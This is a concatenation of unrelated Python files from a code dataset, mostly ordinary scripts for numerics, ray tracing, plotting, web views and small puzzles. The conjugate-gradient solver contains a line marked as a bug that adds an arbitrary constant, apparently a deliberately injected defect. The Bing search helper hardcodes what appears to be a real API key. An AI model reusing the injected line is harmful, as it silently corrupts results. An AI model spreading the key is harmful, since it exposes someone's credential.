\"Processed_data/val_loss_\" + model_name+\".txt\"\n np.savetxt(vallosspath, np.array(val_loss), fmt=\"%s\")\n print('Finished writing loss files')\n\n net.load_state_dict(torch.load(hdf5_filepath))\n print('loaded nn file')\n\n Y_test = []\n for i, data in enumerate(testloader, 0):\n inputs = data[0]\n outputs = net(inputs.cuda().float())\n Y_test.append(outputs.cpu().data.numpy())\n Y_test = np.concatenate(Y_test, axis=0)\n Y_test = Y_test/1000000\n savefilepath = \"Processed_data/Test_NN_\" + model_name+\".mat\"\n scipy.io.savemat(savefilepath,{'Y_test': Y_test})\n \n Y_real = []\n for i, data in enumerate(realloader, 0):\n inputs = data[0]\n outputs = net(inputs.cuda().float())\n Y_real.append(outputs.cpu().data.numpy())\n Y_real = np.concatenate(Y_test, axis=0)\n Y_real = Y_real/1000000\n savefilepath = \"Processed_data/Real_NN_\" + model_name+\".mat\"\n scipy.io.savemat(savefilepath,{'Y_real': Y_real})\n \n print('Saved predited data')","sub_path":"fNIRS_denoise_pytorch_2(1).py","file_name":"fNIRS_denoise_pytorch_2(1).py","file_ext":"py","file_size_in_byte":14107,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"234483282","text":"from primitives import Ray, Triangle, Box, BoxStack\nimport numpy as np\nimport numba\nfrom constants import COLLISION_SHIFT\n\n\n@numba.jit(nogil=True, fastmath=True)\ndef ray_triangle_intersect(ray: Ray, triangle: Triangle):\n if np.dot(ray.direction, triangle.normal) >= 0:\n return None\n h = np.cross(ray.direction, triangle.e2)\n a = np.dot(h, triangle.e1)\n\n if a <= 0:\n return None\n\n f = 1. / a\n s = ray.origin - triangle.v0\n u = f * np.dot(s, h)\n if u < 0. or u > 1.:\n return None\n q = np.cross(s, triangle.e1)\n v = f * np.dot(q, ray.direction)\n if v < 0. or v > 1.:\n return None\n\n if (1 - u - v) < 0. or (1 - u - v) > 1.:\n return None\n\n t = f * np.dot(triangle.e2, q)\n if t > COLLISION_SHIFT:\n return t\n else:\n return None\n\n\n@numba.jit(nogil=True, fastmath=True)\ndef ray_box_intersect(ray: Ray, box: Box):\n txmin = (box.bounds[ray.sign[0]][0] - ray.origin[0]) * ray.inv_direction[0]\n txmax = (box.bounds[1 - ray.sign[0]][0] - ray.origin[0]) * ray.inv_direction[0]\n tymin = (box.bounds[ray.sign[1]][1] - ray.origin[1]) * ray.inv_direction[1]\n tymax = (box.bounds[1 - ray.sign[1]][1] - ray.origin[1]) * ray.inv_direction[1]\n\n if txmin > tymax or tymin > txmax:\n return False, 0., 0.\n tmin = max(txmin, tymin)\n tmax = min(txmax, tymax)\n\n tzmin = (box.bounds[ray.sign[2]][2] - ray.origin[2]) * ray.inv_direction[2]\n tzmax = (box.bounds[1 - ray.sign[2]][2] - ray.origin[2]) * ray.inv_direction[2]\n\n if tmin > tzmax or tzmin > tmax:\n return False, 0., 0.\n tmin = max(tmin, tzmin)\n tmax = min(tmax, tzmax)\n if tmax > COLLISION_SHIFT:\n return True, tmin, tmax\n else:\n return False, 0., 0.\n\n\n@numba.jit(nogil=True, fastmath=True)\ndef bvh_hit_inner(ray: Ray, box: Box, least_t: float):\n hit, t_low, t_high = ray_box_intersect(ray, box)\n return hit and t_low <= least_t\n\n\n@numba.jit(nogil=True, fastmath=True)\ndef bvh_hit_leaf(ray: Ray, box: Box, least_t):\n hit, t_low, t_high = ray_box_intersect(ray, box)\n if not hit:\n return None, least_t\n least_hit = None\n for triangle in box.triangles:\n t = ray_triangle_intersect(ray, triangle)\n if t is not None and 0 < t < least_t:\n least_t = t\n least_hit = triangle\n return least_hit, least_t\n\n\n@numba.njit\ndef visibility_test(root: Box, ray_a: Ray, ray_b: Ray):\n delta = ray_b.origin - ray_a.origin\n least_t = np.linalg.norm(delta)\n direction = delta / least_t\n if np.dot(ray_a.normal, direction) <= 0 or np.dot(ray_b.normal, -1 * direction) <= 0:\n return False\n test_ray = Ray(ray_a.origin, direction)\n stack = BoxStack()\n stack.push(root)\n while stack.size:\n box = stack.pop()\n if box.left is not None and box.right is not None:\n if bvh_hit_inner(test_ray, box, least_t):\n stack.push(box.left)\n stack.push(box.right)\n else:\n hit, t = bvh_hit_leaf(test_ray, box, least_t)\n if hit is not None and t < least_t:\n return False\n return True\n\n\n@numba.njit\ndef traverse_bvh(root: Box, ray: Ray):\n least_t = np.inf\n least_hit = None\n stack = BoxStack()\n stack.push(root)\n while stack.size:\n box = stack.pop()\n if box.left is not None and box.right is not None:\n if bvh_hit_inner(ray, box, least_t):\n stack.push(box.left)\n stack.push(box.right)\n else:\n hit, t = bvh_hit_leaf(ray, box, least_t)\n if hit is not None and t < least_t:\n least_hit = hit\n least_t = t\n\n return least_hit, least_t\n","sub_path":"src/collision.py","file_name":"collision.py","file_ext":"py","file_size_in_byte":3705,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"383344436","text":"import matplotlib.pyplot as plt\nimport numpy as np \n\n# x = np.arange(-4,4,.1)\n# x = np.linspace(-4,4,25)\nx = np.linspace(0, 2*np.pi, 50)\ny = np.sin(x)\n# y = np.square(x)\ny2 = np.cos(x)\n# y2 = y+2\nplt.grid(True)\nplt.xlabel(\"sin X\")\nplt.ylabel(\"cos X\")\nplt.title(\"My Graph\")\n# plt.axis([0,5, 2, 11])\nplt.plot(x, y, 'r-*', linewidth = 2, markersize = 7, label='Red') #r=red colour, - continous line, * is points\nplt.plot(x, y2, 'b-o', linewidth = 2, markersize = 7, label='blue')\nplt.legend(loc='lower left')#loc defines location\nplt.show()\n","sub_path":"pyPro/matPlotLib/matBasic1.py","file_name":"matBasic1.py","file_ext":"py","file_size_in_byte":538,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"20756280","text":"from algorithms.clf import Clf\nfrom scipy.special import expit\nimport scipy.sparse.linalg\nimport numpy as np\nimport sys\nsys.path.append(r'..')\n\n\n\"\"\"\nPreconditioned Conjugate Gradient Method\n\"\"\"\n\ndef precond(M, r):\n\tq = M * r\n\treturn q\n\n\ndef cg(A, b, x=None, tol=1.0e-3, max_iter=100):\n\t# precondition\t\n A = np.matrix(A); b = np.matrix(b);\n A_scaling = np.linalg.norm(A)\n b_scaling = np.linalg.norm(b)\n A = A / A_scaling\n b = b / b_scaling\n normb = np.linalg.norm(b, 'fro')\n m = b.shape[0]\n if np.linalg.norm(A,'fro') > 1e-12:\n \tM = np.linalg.inv(np.diag(np.diag(A.T*A)))\n else:\n \tM = np.eye(m)\n x = np.zeros((m, 1))\n Aq = np.dot(A, x) \n r = b - Aq\n q = precond(M, r) \t\n tau_old = np.linalg.norm(q)\n rho_old = np.dot(r.T, q)\n theta_old = 0\n Ad = np.zeros((m, 1))\n d = np.zeros((m, 1))\n res = r\n \n tiny = 1e-30\n for i in range(max_iter):\n Aq = np.dot(A, q)\n sigma = np.dot(q.T, Aq)\n \n if abs(sigma.item()) < tiny:\n \tbreak\n else:\n\t alpha = rho_old / sigma;\n\t alpha = alpha.item()\n\t r = r - alpha * Aq\n u = precond(M, r)\n\n theta = np.linalg.norm(u)/tau_old\n c = 1 / np.sqrt(1+theta*theta)\n tau = tau_old * theta * c\n gam = c*c*theta_old*theta_old\n eta = c*c*alpha\n d = gam * d + eta * q\n x = x + d\n\n # stop\n#----bug----\n#Ad = gam*Ad+eta*Aq\n Ad = gam*Ad+eta*Aq-5.085112081976022\n res = res - Ad\n if np.linalg.norm(res) < tol*normb:\n break\n else:\n rho = np.dot(r.T, u)\n beta = rho / rho_old\n beta = beta.item()\n q = u + beta * q\n\n rho_old = rho\n tau_old = tau\n theta_old = theta\n return x * (b_scaling / A_scaling)\n\n\nclass Newton_m53():\n \"\"\"docstring for LogReg_NewtonMethod_GoldenVersion\"\"\"\n\n def p1(self, x):\n # avoid overflow\n return .5 * (1 + np.tanh(.5 * x))\n # return 1/(1+np.exp(-x))\n\n def delta(self, beta, X, y):\n n = X.shape[1]\n tmp = beta.copy(); tmp[n-1] = 0;\n grad = - X.T * (y - self.p1(X * beta)) + 1*tmp\n temp = np.multiply(self.p1(X * beta), (1 - self.p1(X * beta)))\n temp = np.tile(temp, (1, X.shape[1]))\n tmp = np.eye(n); tmp[n-1,n-1] = 0;\n hessian = X.T * np.multiply(X, temp) + 1*tmp\n return grad, hessian\n\n # newtonMethod\n def fit(self, X_train, y_train, max_iter=100, tol=1e-3):\n X = np.mat(X_train.copy()) # convert to NumPy matrix\n y = np.mat(y_train.copy()).transpose() # convert to NumPy matrix\n\n # label -1 by 0 if exists\n y[y == -1] = 0\n\n m, n = np.shape(X)\n\n # add logitR to verify the correctness\n # from sklearn.linear_model import LogisticRegression\n # LogitR = LogisticRegression(solver='lbfgs').fit(X, np.array(y).ravel())\n # w1 = LogitR.coef_; b1 = LogitR.intercept_\n # w1 = w1.reshape(-1); b1 = b1[0]\n # \n X = np.column_stack((X, np.ones((m, 1))))\n\n # initial\n w = np.zeros((n+1, 1))\n for k in range(max_iter):\n # compute gradient and hessian\n grad, hessian = self.delta(w, X, y)\n # compute newton direction\n # d = scipy.sparse.linalg.cg(hessian, grad)[0]\n d = cg(hessian, grad)\n d = d.reshape(-1, 1)\n # update w\n w = w - d\n if np.linalg.norm(grad) < tol:\n break\n\n #if k == max_iter - 1:\n # print('convergence fail, the current norm of gradient is {}'.format(\n # np.linalg.norm(grad)))\n\n w = np.array(w).flatten()\n b = w[-1]\n w = w[0:w.shape[0]-1]\n\n # print(np.linalg.norm(w1-w), b, b1)\n\n clf = Clf(w, b)\n return clf\n","sub_path":"algorithms/Logistic_regression/Newton/Newton_m53.py","file_name":"Newton_m53.py","file_ext":"py","file_size_in_byte":3845,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"519109400","text":"##########################################################################\n# NSAp - Copyright (C) CEA, 2013\n# Distributed under the terms of the CeCILL-B license, as published by\n# the CEA-CNRS-INRIA. Refer to the LICENSE file or to\n# http://www.cecill.info/licences/Licence_CeCILL-B_V1-en.html\n# for details.\n##########################################################################\n\n# Cubicweb import\nfrom cubicweb.web.views.startup import IndexView\nfrom cubicweb.predicates import is_instance\nfrom cubicweb.web.views.primary import PrimaryView\n\n# Cubes import\nfrom cubes.brainomics.views.startup import BrainomicsIndexView\n\n\nclass NSIndexView(IndexView):\n \"\"\" Class that defines the piws index view.\n \"\"\"\n\n def call(self, **kwargs):\n \"\"\" Create the 'index' like page of our site.\n \"\"\"\n # Get the card that contains some text description about this site\n rset = self._cw.execute(\"Any X WHERE X is Card, X title 'index'\")\n self.wview(\"primary\", rset=rset)\n\n\n###############################################################################\n# Card View\n###############################################################################\n\nclass NSCardView(PrimaryView):\n \"\"\" Class that that defines how we print card entities.\n \"\"\"\n __select__ = PrimaryView.__select__ & is_instance(\"Card\")\n\n def call(self, rset=None, **kwargs):\n \"\"\" Format the card entity content.\n \"\"\"\n # Get the rset\n rset = self.cw_rset or rset\n\n # Get additional resources links\n resources = {\n \"demo-url\": \"http://mart.intra.cea.fr/senior/\",\n \"license-url\": self._cw.build_url(\"license\"),\n \"connect-image\": self._cw.data_url(\"images/dreamstime_s_33211444.jpg\"),\n \"database-image\": self._cw.data_url(\"images/dreamstime_s_32994616.jpg\"),\n \"nsap-image\": self._cw.data_url(\"images/nsap.png\"),\n \"nsap-url\": \"https://bioproj.extra.cea.fr/redmine/projects/nsap\",\n }\n\n # Update card links links to content\n content = rset.get_entity(0, 0).content\n content = content % resources\n self.w(content)\n\n\ndef registration_callback(vreg):\n vreg.register_and_replace(NSIndexView, BrainomicsIndexView)\n vreg.register(NSCardView)\n","sub_path":"piws/views/startup.py","file_name":"startup.py","file_ext":"py","file_size_in_byte":2283,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"438097448","text":"\"\"\"Contains fixtures used across the module.\"\"\"\nimport pytest\n\n\n@pytest.fixture(name=\"global_vars\")\ndef fixture_global_vars():\n \"\"\"Defines the characteristics of the federated simulation.\"\"\"\n federated_learning_variables = {\"n_features\": 23,\n \"n_classes\": 2,\n \"n_embeddings\": 3,\n \"num_data\": 100,\n \"batch_size\": 32,\n \"n_nodes\": 3,\n \"metrics\": [0, 1, 2, 3]}\n\n return federated_learning_variables\n\n\nclass Helpers:\n \"\"\"Delivers static helper functions to avoid duplicated code.\"\"\"\n\n @staticmethod\n def check_initialization(federated_government):\n \"\"\"Checks the initialization of high-level federated learning objects.\"\"\"\n assert hasattr(federated_government, \"_nodes_federation\")\n assert hasattr(federated_government, \"_server\")\n\n @staticmethod\n def check_initialization_high_level(federated_government, fed_gov_init):\n \"\"\"Checks the initialization of high-level federated learning objects.\"\"\"\n fed_gov_init.assert_called_once()\n assert hasattr(federated_government, \"_test_data\")\n assert hasattr(federated_government, \"_test_labels\")\n\n\n@pytest.fixture\ndef helpers():\n \"\"\"Returns the helpers class.\"\"\"\n return Helpers\n","sub_path":"test/federated_government/conftest.py","file_name":"conftest.py","file_ext":"py","file_size_in_byte":1404,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"249097019","text":"import os\nimport numpy as np \nimport matplotlib.pyplot as plt\nimport nibabel as nib\nimport glob\n\nclass Patient():\n\tdef __init__(self, dir_name = \"\"):\n\t\t\n\t\tself.studyList = glob.glob('????????_??????.nii')\n\t\tself.studyList.sort()\n\n\t\t# declare the reference week 0 scan\n\t\tself.ref = self.studyList[0]\n\t\t# week 3\n\t\tself.flo1 = self.studyList[1]\n\t\t# week 8\n\t\tself.flo2 = self.studyList[2]\n\nclass Similarity( Patient ):\n\tdef __init__(self, pat ):\n\t\t# initialise all of the similarity measure lists\n\t\tlnccList = glob.glob('lncc*.txt')\n\t\tnovelLnccList = glob.glob('novel_lncc*.txt')\n\t\tself.regList = self.getRegParams(lnccList)\n\t\tPlotSim( self )\n\n\tdef getRegParams(self, regList):\n\t\t# now perform analysis\n\t\tregList2 = []\n\t\tfor regType in regList:\n\t\t\treg = Registration(regType)\n\t\t\tregList2.append(reg)\n\t\treturn regList2\t\n\nclass PlotSim( Similarity ):\n\tdef __init__( self, sim ):\n\t\tcpList = []\n\t\tmeasureList = []\n\t\tfor reg in sim.regList:\n\t\t\t# this is where you can change what you want to \n\t\t\t# examine! \n\t\t\tif reg.be == 0.01 and reg.week == 3:\n\t\t\t\tcpList.append(reg.cp)\n\t\t\t\tmeasureList.append(reg.measure)\n\n\t\tcpList, measureList = zip(*sorted(zip(cpList,measureList)))\n\t\tcps = np.array(cpList)\n\t\tmeasures = np.array(measureList)\n\t\tfig = plt.figure()\n\t\tplt.plot(cps, measures)\n\t\tplt.show()\n\n\t\tbeList = []\n\t\tmeasureList = []\n\t\tfor reg in sim.regList:\n\t\t\t# this is where you can change what you want to \n\t\t\t# examine! \n\t\t\tif reg.cp == 5 and reg.week == 3:\n\t\t\t\tbeList.append(reg.be)\n\t\t\t\tmeasureList.append(reg.measure)\n\n\t\tbeList, measureList = zip(*sorted(zip(beList,measureList)))\n\t\tbes = np.array(beList)\n\t\tmeasures = np.array(measureList)\n\t\tfig = plt.figure()\n\t\tplt.plot(bes, measures)\n\t\tplt.show()\n\n\nclass Registration():\n\t# for each type of registration (with different parameters)\n\t# assign all of the information to this class\n\tdef __init__(self, regType):\n\t\treg = regType.split('_')\n\t\t# ---- BE CAERFUL HERE ----- #\n\t\tif len(reg) == 6:\n\t\t\tself.week = int(reg[1][-1])\n\t\t\tself.cp = int(reg[4][3:])\n\t\t\tself.be = np.float(reg[5][2:-4])\n\t\t\tself.sim = reg[0]\n\t\t\tself.filename = regType\n\t\t\tself.measure = self.getMeasure(regType)\n\n\tdef getMeasure(self, filename):\n\t\twith open(filename, 'r') as f:\n\t\t\treturn np.float(f.read())\n\n\ndef main():\n\n\t# Types of analysis to peform\n\tanalysisTypeList = ['sim']\n\t# Path to patient data\n\tdataPath = 'N:\\\\NiiForOptimisation'\n\t# Number of patients to analyse\n\tpt_num = ['p1', 'p2', 'p3']\n\n\t# Parameters of interest\n\tcps = [4, 5]\n\tbes = [0.005, 0.01, 0.05]\n\n\tfor aType in analysisTypeList:\n\t\tfor i in range(len(pt_num)):\n\t\t\tpat = pt_num[i]\n\t\t\tdir_name = os.path.join(dataPath, pat)\n\t\t\t# change directory to the patient directory\n\t\t\tos.chdir(dir_name)\n\t\t\t# declare the patient\n\t\t\tp = Patient(dir_name)\n\n\t\t\tif aType == 'sim':\n\t\t\t\ta = Similarity(p)\n\nif __name__ == '__main__':\n\tmain()","sub_path":"bin/analyse_dir_validation.py","file_name":"analyse_dir_validation.py","file_ext":"py","file_size_in_byte":2807,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"425232943","text":"'''\n题目:复杂链表的复制\n'''\n# -*- coding:utf-8 -*-\n# class RandomListNode:\n# def __init__(self, x):\n# self.label = x\n# self.next = None\n# self.random = None\nclass Solution:\n # 返回 RandomListNode\n def Clone(self, pHead):\n # write code here\n if pHead==None:\n \treturn None\n #1、复制每个结点,如复制结点A得到A1,将结点A1插到结点A后面\n node=pHead\n while node!=None:\n \tcloneNode=RandomListNode(node.label)\n \tnext=node.next\n \tcloneNode.next=next\n \tnode.next=cloneNode\n \tnode=next\n #2、重新遍历链表,复制老结点的随机指针给新结点,如A1.random = A.random.next\n node=pHead\n while node!=None:\n \tcloneNode=node.next\n \trandomNode=node.random\n \tif randomNode!=None:\n \t\tcloneNode.random=randomNode.next\n \tnode=cloneNode.next\n #3、拆分链表,将链表拆分为原链表和复制后的链表\n cloneHead=pHead.next\n node=pHead\n #拆分的第一种方法:每两个节点来处理,current不为NULL,则current->next也一定不为NULL\n while node!=None:\n \tcloneNode=node.next\n \tnode.next=cloneNode.next\n \tif cloneNode.next!=None:\n \t\tcloneNode.next=cloneNode.next.next\n \tnode=node.next\n return cloneHead\n\n#拆分的第二种方法:每一个节点来处理,current->next不为空\n while node.next!=None:\n \tnext=node.next\n \tnode.next=next.next#因为node.next==None时 node无next\n \tnode=next\n","sub_path":"python/25.py","file_name":"25.py","file_ext":"py","file_size_in_byte":1619,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"122964138","text":"from collections import Counter\r\n# Python program to print a hollow \r\n# inverted pyramid pattern \r\n\r\ndef printPattern(n) : \r\n for i in range(1,n+1) :\r\n for j in range(1,i) :\r\n print (\" \",end=\"\")\r\n for j in range(1,(n * 2 - (2 * i - 1))+1):\r\n if (i == 1 or j == 1 or j == (n * 2 - (2 * i - 1))):\r\n print (\".\", end=\"\") \r\n else :\r\n print(\" \", end=\"\") \r\n print (\"\")\r\n\r\nwhile(1):\r\n k=input().split(\" \")\r\n p=int(input())\r\n k=\"\".join(k)\r\n c=Counter(k)\r\n c=c.most_common()\r\n v=c[p-1][1]\r\n printPattern(v)\r\n","sub_path":"Solutions/CODE3000 round3 solutions/Challenge 15/contest-15 c-2.py","file_name":"contest-15 c-2.py","file_ext":"py","file_size_in_byte":606,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"483013420","text":"import importlib\nimport logging\n\nfrom flask import flash, jsonify, redirect, render_template, request, url_for\nfrom flask_user import login_required\n\nfrom asclepios_app.custom.methods import rgetattr, rsetattr\nfrom asclepios_app.custom.fields import name_to_form\nfrom asclepios_app.custom.parse import parse_field\nfrom asclepios_app.models import *\nfrom asclepios_app.main import bp\n\n\nlogging.basicConfig(\n filename='asclepios.log',\n filemode='w',\n format='%(asctime)s.%(msecs)03d %(levelname)s:\\t%(message)s', \n level=logging.INFO, \n datefmt='%d-%b-%y %H:%M:%S')\n\n\n@bp.before_request\ndef before_request():\n if current_user.is_authenticated:\n current_user.last_seen = datetime.utcnow()\n current_user.save()\n #g.search_form = SearchForm()\n\n\n@bp.route('/')\n@bp.route('/index')\n@login_required\ndef index():\n roles = current_user.roles\n if len(roles) == 1:\n if 'medical' in roles or 'nurse' in roles or 'chief_nurse' in roles or 'nurse' in roles or 'psycho' in roles:\n return redirect(url_for('medical.index'))\n if 'admin' in roles:\n return redirect(url_for('admin.index'))\n if 'doctor' in roles:\n return redirect(url_for('medical.hospitalization_doctor', idx=current_user.id))\n else:\n return render_template(\n 'index.html', \n user_id=current_user.id)\n\n\n@bp.route('/prepare_form', methods=['POST'])\ndef prepare_form():\n action = request.form['action']\n collection = request.form['collection']\n target = request.form['target']\n\n if action == 'create':\n return jsonify({'action': action,\n 'collection': collection,\n 'target': target})\n if action == 'update':\n idx = request.form['id']\n # models implemented in the MongoDB\n models = importlib.import_module('asclepios_app.models')\n Model = getattr(models, collection)\n # locate the model associated to `collection and find the corresponding document\n document = Model.objects(id=idx).first()\n\n # specific form associated to 'collection'\n form = name_to_form(collection + 'Form')()\n data = {field_form: parse_field(rgetattr(document, field_db)) for field_form, field_db in form.__form_vs_db__.items()}\n disabled_fields = form.__static_fields__\n return jsonify({'data': data,\n 'disabled_fields': disabled_fields,\n 'action': action,\n 'id': idx,\n 'collection': collection,\n 'target': target})\n return jsonify({})\n\n\n@bp.route('/process_form', methods=['POST'])\ndef process_form():\n collection = request.form['collection']\n action = request.form['action']\n\n # specific form associated to 'collection'\n form = name_to_form(collection + 'Form')()\n\n if form.validate_on_submit():\n # models implemented in the MongoDB\n models = importlib.import_module('asclepios_app.models')\n Model = getattr(models, collection)\n\n if action == 'create':\n document = Model()\n flash_text = 'El registro se creó con éxito.'\n elif action == 'update':\n idx = request.form['id']\n document = Model.objects(id=idx).first()\n flash_text = 'El registro se actualizó con éxito.'\n # initialize all the document fields\n if hasattr(Model, '__document_fields__'):\n for field, data in Model.__document_fields__.items():\n # get the document from the database. 'field' is the field name in the model,\n # while data['model'] is the model name referenced. data['search_field']\n # is the field by which we are going to query and data['search_data'] is the\n # data that we are going to query.\n doc_field = getattr(models, data['model']).objects(\n __raw__={data['search_field']: getattr(form, data['search_data']).data}).first()\n # we set the retrieved document to the model ReferenceField\n setattr(document, field, doc_field)\n # initialize all embedded document fields\n if hasattr(Model, '__embedded_fields__'):\n for field_name, field_obj in Model.__embedded_fields__.items():\n setattr(document, field_name, getattr(models, field_obj)())\n # initialize all the simple fields\n for field_form, field_db in form.__form_vs_db__.items():\n rsetattr(document, field_db, rgetattr(form, field_form).data)\n\n document.set_fields()\n if hasattr(document, 'autor'):\n document.set_author()\n document.save()\n flash(flash_text)\n return jsonify({})\n return jsonify({'errors': form.errors})\n","sub_path":"asclepios_app/main/routes.py","file_name":"routes.py","file_ext":"py","file_size_in_byte":4831,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"509054013","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.shortcuts import render,redirect\nfrom models import UserProfile,school,rack\nfrom django.contrib.auth.models import User\nfrom forms import SignupForm,loginForm\nfrom django.contrib.auth import authenticate\n\nfrom django.views. generic import DetailView\n\n# Create your views here.\ndef addracks(request):\n\tif request.method==\"POST\":\n\t\tr=rack(r_number=request.POST.get(\"r_number\"))\n\t\tr.save()\n\n\n\treturn render(request,\"app/addracks.html\",{\"msg\":\"created scussflly\"})\n\ndef showschool(request):\n\tsc=school.objects.all()\n\treturn render(request,\"app/showschool.html\",{\"sc\":sc})\n\n\ndef createschool(request):\n\tif request.method==\"POST\":\n\t\tsc=school(s_name=request.POST.get(\"name\"))\n\t\tsc.save()\n \n\treturn render(request,\"app/school.html\")\nclass profileDetailView(DetailView):\n\tmodel = UserProfile\n\ndef controller(request):\n\treturn render(request,\"app/controller.html\")\n\ndef userReg(request):\n\tmsg=\"\"\n\tform=SignupForm()\n\tif request.method==\"POST\":\n\t\tuser_profile=SignupForm(request.POST)\n\t\tif user_profile.is_valid():\n\t\t\tUserProfile.objects.create_user(**user_profile.cleaned_data)\n\t\t\tmsg=\"userrole created susfully\"\n\n\treturn render(request,'SignupForm.html',{\"form\":form,\"msg\":msg})\ndef login(request):\n\tmsg=\" \"\n\trequest.session['user']=None\n\tif request.method==\"POST\":\n\t\tuser=authenticate(username=request.POST.get('username'),\n\t\t\tpassword=request.POST.get('password'))\n\t\tif user:\n\t\t\tuser_profiles=UserProfile.objects.filter(user_ptr=user)\n\t\t\tif user_profiles:\n\t\t\t\tuser_profile=user_profiles[0]\n\t\t\t\trequest.session['user']={\"username\":user.username,\n\t\t\t\t\"role\":user_profile.role,\"id\":user_profile.id}\n\t\t\t\tmsg=\"created userprofile\"\n\t\t\t\treturn redirect(controller)\n\t\t\telse:\n\t\t\t\tmsg=\"User profile is not created \"\n\t\telse:\n\t\t\tmsg=\"login failed\"\n\treturn render(request,\"app/login.html\",{\"msg\":msg})\n\n\n","sub_path":"schoolmanagement/app/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1862,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"178902625","text":"\"\"\"Backup FILE to an embedded file inside FILE.\"\"\"\n\nimport logging\nimport os\nimport os.path\nimport shutil\nimport ebmeta\n\nlog = logging.getLogger('backup')\n\ndef run():\n \"\"\"Run this action.\"\"\"\n\n path = ebmeta.arguments.filename\n abspath = os.path.abspath(path)\n folder = os.path.dirname(abspath)\n\n backup_folder = os.path.join(folder, \".backup\")\n backup_path = os.path.join(\n backup_folder, os.path.basename(path) + \".backup\"\n )\n\n if os.path.exists(backup_path):\n log.debug(\"Skipping backup because a backup was found in \\\"{}\\\".\".format(backup_path))\n return\n\n if not os.path.exists(backup_folder): os.mkdir(backup_folder)\n\n shutil.copy2(abspath, backup_path)\n log.debug(\"Wrote backup file to \\\"{}\\\".\".format(backup_path))\n","sub_path":"ebmeta/actions/backup.py","file_name":"backup.py","file_ext":"py","file_size_in_byte":775,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"481647581","text":"import speech_recognition as sr\n\nr=sr.Recognizer()\n\ns=''\nwhile s.lower()!='bye':\n\twith sr.Microphone() as source:\n\t\tprint('Say something!')\n\t\taudio=r.listen(source)\n\ttry:\n\t\ts=r.recognize_google(audio)\n\t\tprint('I think you said ' + s)\n\texcept sr.UnknownValueError:\n\t\tprint('Sorry, try again!')\n\texcept sr.RequestError as e:\n\t\tprint('Could not request results from Google Speech Recognition service; {0}'.format(e))\nprint('Have a nice day!')\n","sub_path":"speech.py","file_name":"speech.py","file_ext":"py","file_size_in_byte":440,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"234806070","text":"from csv_comparison_package import Compare\nfrom csv_comparison_package import Field\nfrom csv_comparison_package import AppErrorHandler\n\n\ndef validate_index_identity(comparable_a: Compare, comparable_b: Compare):\n comparable_a_index_name = comparable_a.index_column_name[0][\n Field.column_name.value] # not supporting multi index\n comparable_b_index_name = comparable_b.index_column_name[0][Field.column_name.value]\n df_a = list(comparable_a.data_frame[comparable_a_index_name])\n df_b = list(comparable_b.data_frame[comparable_b_index_name])\n is_a_in_b = [val in df_b for val in df_a]\n\n if not all(is_a_in_b):\n raise AppErrorHandler(AppErrorHandler.invalid_index_list)\n","sub_path":"csv_comparison_package/cell_comparator/__validate_index_identity.py","file_name":"__validate_index_identity.py","file_ext":"py","file_size_in_byte":701,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"143741122","text":"import json\nimport urllib.parse, urllib.request, urllib.error\n#import poll.keys as keys\nBING_API_KEY = '9f539be65a4c4253807c79b0a38f74d1'\n\nimport requests\n\ndef bing_search(query):\n results=[]\n url = 'https://api.cognitive.microsoft.com/bing/v5.0/search'\n # query string parameters\n payload = {'q': query}\n # custom headers\n headers = {'Ocp-Apim-Subscription-Key': BING_API_KEY}\n # make GET request\n r = requests.get(url, params=payload, headers=headers)\n # get JSON response\n j = r.json()\n\n for result in j['webPages']['value']:\n results.append({\n 'title': result['name'],\n 'link': result['url'],\n 'summary': result['snippet']})\n\n print(results)\n return results\n\nif __name__ == '__main__':\n bing_search('good news')","sub_path":"poll/bing_search.py","file_name":"bing_search.py","file_ext":"py","file_size_in_byte":797,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"419395937","text":"\"\"\"\r\nID: kqanto1\r\nLANG: PYTHON3\r\nTASK: namenum\r\n\"\"\"\r\nd = {'A':2, 'B':2, 'C':2, 'D':3, 'E':3, 'F':3, 'G':4, 'H':4, 'I':4, 'J':5, 'K':5, 'L':5,\r\n 'M':6, 'N':6, 'O':6, 'P':7, 'R':7, 'S':7, 'T':8, 'U':8, 'V':8, 'W':9, 'X':9, 'Y':9}\r\n\r\nnames = []\r\nnamesn = []\r\nwith open(\"namenum.in\", 'r') as f:\r\n n = int(f.readline())\r\nwith open('dict.txt', 'r') as f:\r\n for i in range(4617):\r\n k = f.readline().split()[0]\r\n if not('Q' in k or 'Z' in k):\r\n names.append(k)\r\nfor i in range(len(names)):\r\n tmp = list(names[i])\r\n for j in range(len(tmp)):\r\n tmp[j] = d[tmp[j]]\r\n namesn.append(int(''.join(map(str,tmp))))\r\nfind = True\r\nwith open(\"namenum.out\", 'w+') as f:\r\n for i in range(len(names)):\r\n if n == namesn[i]:\r\n f.write(f\"{names[i]}\\n\")\r\n find = False\r\n if find:\r\n f.write(f\"NONE\\n\")\r\n\r\n\r\n","sub_path":"usaco/1.3/namenum.py","file_name":"namenum.py","file_ext":"py","file_size_in_byte":879,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"453311865","text":"\"\"\"Test the LTI interconnection 